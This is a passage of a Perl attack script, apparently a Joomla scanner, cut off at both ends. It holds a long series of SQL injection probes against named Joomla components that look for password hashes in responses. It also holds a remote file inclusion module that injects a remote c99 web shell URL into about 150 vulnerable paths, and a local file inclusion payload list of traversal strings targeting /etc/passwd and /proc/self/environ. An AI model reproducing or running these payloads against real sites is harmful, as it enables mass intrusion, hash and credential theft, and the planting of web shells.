  988. print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
  989. }
  990. else{print "\n[-] Error\n";
  991. }
  992.  
  993. $host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
  994. $res = $b->request(HTTP::Request->new(GET=>$host));
  995. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  996. print "[*] Results : CHECK : \n";
  997. print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
  998. }
  999. else{print "\n[-] Error\n";
  1000. }
  1001.  
  1002. $host = $target . "/index.php?option=com_abc&view=abc&letter=AS&sectionid=-999 .$com_abc.";
  1003. $res = $b->request(HTTP::Request->new(GET=>$host));
  1004. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1005. print "[*] Results : CHECK : \n";
  1006. print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
  1007. }
  1008. else{print "\n[-] Error\n";
  1009. }
  1010.  
  1011. $host = $target . "/index2.php?option=com_joomradio&page=show_video&id=-999 .$com_joomradio.";
  1012. $res = $b->request(HTTP::Request->new(GET=>$host));
  1013. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1014. print "[*] Results : CHECK : \n";
  1015. print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
  1016. }
  1017. else{print "\n[-] Error\n";
  1018. }
  1019.  
  1020. $host = $target . "/index.php?option=com_jtm&view=search&view=search&author=-999 .$com_jtm.";
  1021. $res = $b->request(HTTP::Request->new(GET=>$host));
  1022. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1023. print "[*] Results : CHECK : \n";
  1024. print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
  1025. }
  1026. else{print "\n[-] Error\n";
  1027. }
  1028.  
  1029. $host = $target . "/index.php?option=com_gbufacebook&task=show_face&face_id=-999 .$com_gbufacebook.";
  1030. $res = $b->request(HTTP::Request->new(GET=>$host));
  1031. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1032. print "[*] Results : CHECK : \n";
  1033. print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
  1034. }
  1035. else{print "\n[-] Error\n";
  1036. }
  1037.  
  1038. $host = $target . "/index.php?option=com_manager&view=flight&Itemid=999 .$com_manager.";
  1039. $res = $b->request(HTTP::Request->new(GET=>$host));
  1040. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1041. print "[*] Results : CHECK : \n";
  1042. print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
  1043. }
  1044. else{print "\n[-] Error\n";
  1045. }
  1046.  
  1047. $host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
  1048. $res = $b->request(HTTP::Request->new(GET=>$host));
  1049. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1050. print "[*] Results : CHECK : \n";
  1051. print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
  1052. }
  1053. else{print "\n[-] Error\n";
  1054. }
  1055.  
  1056. $host = $target . "/index.php?option=com_sermonspeaker&task=latest_sermons&id=-999 .$com_sermonspeaker.";
  1057. $res = $b->request(HTTP::Request->new(GET=>$host));
  1058. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1059. print "[*] Results : CHECK : \n";
  1060. print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
  1061. }
  1062. else{print "\n[-] Error\n";
  1063. }
  1064.  
  1065. $host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetails&id=-999 .$com_jdrugstopics.";
  1066. $res = $b->request(HTTP::Request->new(GET=>$host));
  1067. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1068. print "[*] Results : CHECK : \n";
  1069. print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
  1070. }
  1071. else{print "\n[-] Error\n";
  1072. }
  1073.  
  1074. $host = $target . "/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
  1075. $res = $b->request(HTTP::Request->new(GET=>$host));
  1076. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1077. print "[*] Results : CHECK : \n";
  1078. print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
  1079. }
  1080. else{print "\n[-] Error\n";
  1081. }
  1082.  
  1083. $host = $target . "/index.php?option=com_articles&task=view_addarticles&sid=999 .$com_articles.";
  1084. $res = $b->request(HTTP::Request->new(GET=>$host));
  1085. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1086. print "[*] Results : CHECK : \n";
  1087. print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
  1088. }
  1089. else{print "\n[-] Error\n";
  1090. }
  1091.  
  1092. $host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&catid=999 .$com_dcs_flashgames.";
  1093. $res = $b->request(HTTP::Request->new(GET=>$host));
  1094. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1095. print "[*] Results : CHECK : \n";
  1096. print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
  1097. }
  1098. else{print "\n[-] Error\n";
  1099. }
  1100.  
  1101. $host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
  1102. $res = $b->request(HTTP::Request->new(GET=>$host));
  1103. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1104. print "[*] Results : CHECK : \n";
  1105. print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
  1106. }
  1107. else{print "\n[-] Error\n";
  1108. }
  1109.  
  1110. $host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
  1111. $res = $b->request(HTTP::Request->new(GET=>$host));
  1112. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1113. print "[*] Results : CHECK : \n";
  1114. print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
  1115. }
  1116. else{print "\n[-] Error\n";
  1117. }
  1118.  
  1119. $host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
  1120. $res = $b->request(HTTP::Request->new(GET=>$host));
  1121. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1122. print "[*] Results : CHECK : \n";
  1123. print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
  1124. }
  1125. else{print "\n[-] Error\n";
  1126. }
  1127.  
  1128. $host = $target . "/index.php?option=com_productbook&Itemid=999&func=detail&id=-999 .$com_productbook.";
  1129. $res = $b->request(HTTP::Request->new(GET=>$host));
  1130. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1131. print "[*] Results : CHECK : \n";
  1132. print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
  1133. }
  1134. else{print "\n[-] Error\n";
  1135. }
  1136.  
  1137. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  1138. $res = $b->request(HTTP::Request->new(GET=>$host));
  1139. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1140. print "[*] Results : CHECK : \n";
  1141. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  1142. }
  1143. else{print "\n[-] Error\n";
  1144. }
  1145.  
  1146. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  1147. $res = $b->request(HTTP::Request->new(GET=>$host));
  1148. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1149. print "[*] Results : CHECK : \n";
  1150. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  1151. }
  1152. else{print "\n[-] Error\n";
  1153. }
  1154.  
  1155. $host = $target . "/index.php?option=com_dms&task=view_category&category_id=-999 .$com_dms.";
  1156. $res = $b->request(HTTP::Request->new(GET=>$host));
  1157. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1158. print "[*] Results : CHECK : \n";
  1159. print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
  1160. }
  1161. else{print "\n[-] Error\n";
  1162. }
  1163.  
  1164. $host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
  1165. $res = $b->request(HTTP::Request->new(GET=>$host));
  1166. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1167. print "[*] Results : CHECK : \n";
  1168. print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
  1169. }
  1170. else{print "\n[-] Error\n";
  1171. }
  1172.  
  1173. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  1174. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  1175. $host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
  1176. $res = $b->request(HTTP::Request->new(GET=>$host));
  1177. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1178. print "[*] Results : CHECK : \n";
  1179. print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
  1180. }
  1181. else{print "\n[-] Error\n";
  1182. }
  1183.  
  1184. $host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
  1185. $res = $b->request(HTTP::Request->new(GET=>$host));
  1186. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1187. print "[*] Results : CHECK : \n";
  1188. print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
  1189. }
  1190. else{print "\n[-] Error\n";
  1191. }
  1192.  
  1193. $host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
  1194. $res = $b->request(HTTP::Request->new(GET=>$host));
  1195. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1196. print "[*] Results : CHECK : \n";
  1197. print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
  1198. }
  1199. else{print "\n[-] Error\n";
  1200. }
  1201.  
  1202. $host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
  1203. $res = $b->request(HTTP::Request->new(GET=>$host));
  1204. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1205. print "[*] Results : CHECK : \n";
  1206. print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
  1207. }
  1208. else{print "\n[-] Error\n";
  1209. }
  1210.  
  1211. }
  1212. if($c eq '4')
  1213. {
  1214. system('cls');
  1215. system('title JOomla Rfi Scanner');
  1216. @RFI = ("/components/com_flyspray/startdown.php?file=",
  1217. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
  1218. "/components/com_simpleboard/file_upload.php?sbp=",
  1219. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
  1220. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
  1221. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
  1222. "/components/com_performs/performs.php?mosConfig_absolute_path=",
  1223. "/components/com_forum/download.php?phpbb_root_path=",
  1224. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
  1225. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
  1226. "/components/minibb/index.php?absolute_path=",
  1227. "/components/com_smf/smf.php?mosConfig_absolute_path=",
  1228. "/modules/mod_calendar.php?absolute_path=",
  1229. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
  1230. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
  1231. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
  1232. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
  1233. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
  1234. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
  1235. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
  1236. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
  1237. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
  1238. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
  1239. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
  1240. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  1241. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
  1242. "/akocomments.php?mosConfig_absolute_path=",
  1243. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
  1244. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  1245. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
  1246. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
  1247. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
  1248. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
  1249. "/components/com_fm/fm.install.php?lm_absolute_path=",
  1250. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
  1251. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
  1252. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
  1253. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
  1254. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
  1255. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
  1256. "/components/com_mambowiki/MamboLogin.php?IP=",
  1257. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
  1258. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
  1259. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
  1260. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
  1261. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
  1262. "/components/com_mospray/scripts/admin.php?basedir=",
  1263. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
  1264. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
  1265. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
  1266. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
  1267. "/components/com_madeira/img.php?url=",
  1268. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  1269. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  1270. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  1271. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  1272. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
  1273. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
  1274. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
  1275. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
  1276. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
  1277. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
  1278. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
  1279. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
  1280. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
  1281. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
  1282. "/index.php?option=com_custompages&cpage=",
  1283. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
  1284. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  1285. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
  1286. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
  1287. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
  1288. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
  1289. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
  1290. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
  1291. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
  1292. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
  1293. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
  1294. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
  1295. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
  1296. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
  1297. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
  1298. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
  1299. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
  1300. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
  1301. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
  1302. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
  1303. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
  1304. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
  1305. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
  1306. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
  1307. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
  1308. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
  1309. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  1310. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
  1311. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  1312. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
  1313. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  1314. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  1315. "/components/com_joomlaboard/file_upload.php?sbp=",
  1316. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
  1317. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
  1318. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
  1319. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
  1320. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
  1321. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
  1322. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
  1323. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
  1324. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
  1325. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
  1326. "/modules/mod_as_category.php?mosConfig_absolute_path=",
  1327. "/components/com_articles.php?absolute_path=",
  1328. "/classes/html/com_articles.php?absolute_path=",
  1329. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
  1330. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
  1331. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
  1332. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
  1333. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
  1334. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
  1335. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
  1336. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
  1337. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
  1338. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
  1339. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
  1340. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
  1341. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
  1342. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
  1343. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
  1344. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
  1345. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
  1346. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
  1347. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
  1348. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
  1349. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
  1350. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
  1351. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
  1352. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
  1353. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
  1354. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  1355. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  1356. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
  1357. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
  1358. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
  1359. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
  1360. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
  1361. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
  1362. "/com_magazine_3_0_1/magazine.functions.php?config=",
  1363. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  1364. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
  1365. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
  1366.  
  1367. print "Please Enter Target [http://www.site.com]";
  1368. print "\n\n Target:";
  1369. $Target=<STDIN>;
  1370. chomp ($Target);
  1371. print"\n\n \t\t Please wait";
  1372. sleep(2);
  1373. print"\n";
  1374.  
  1375. foreach $RFI(@RFI){
  1376. my $URL =$Target.$RFI."http://www.sh3ll.org/c99.txt";
  1377. my $Source = get $URL;
  1378. die "Can not get $URL" unless defined $URL;
  1379. if ($Source =~ /c99shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
  1380. else { $Message = "NOT FOUND RFI Vulnerability";}
  1381. print "\n \n \n \n \t \t \t \t FINISH ";
  1382. print "\n $URL  =>   $Message \n";
  1383. open (TEXT, '>>RFI.txt');
  1384. print TEXT "\n $URL   =>   $Message \n\n";
  1385. close (TEXT);
  1386. print 'result in RFI.txt';
  1387.  
  1388. }
  1389.  
  1390.  
  1391. }
  1392. if($c eq '3')
  1393. {
  1394. system('cls');
  1395. system('title Joomla LFI Scanner');
  1396. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F